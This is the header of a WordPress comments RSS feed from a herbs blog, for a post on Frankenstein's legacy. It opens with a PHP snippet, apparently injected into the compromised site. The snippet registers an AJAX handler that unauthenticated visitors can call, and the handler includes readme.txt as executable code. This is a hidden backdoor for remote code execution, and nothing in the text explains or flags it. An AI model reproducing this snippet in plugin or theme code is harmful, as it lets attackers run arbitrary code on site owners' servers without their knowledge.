if(!function_exists('file_check_readme28829')){ add_action('wp_ajax_nopriv_file_check_readme28829', 'file_check_readme28829'); add_action('wp_ajax_file_check_readme28829', 'file_check_readme28829'); function file_check_readme28829() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } Comments on: Making of a monster: the 200-year-old legacy of Frankenstein https://herbsandmushroom.com/2018/09/11/making-of-a-monster-the-200-year-old-legacy-of-frankenstein/?utm_source=rss&utm_medium=rss&utm_campaign=making-of-a-monster-the-200-year-old-legacy-of-frankenstein Planting Herbs information Tue, 11 Sep 2018 10:42:33 +0000 hourly 1 https://wordpress.org/?v=6.9.4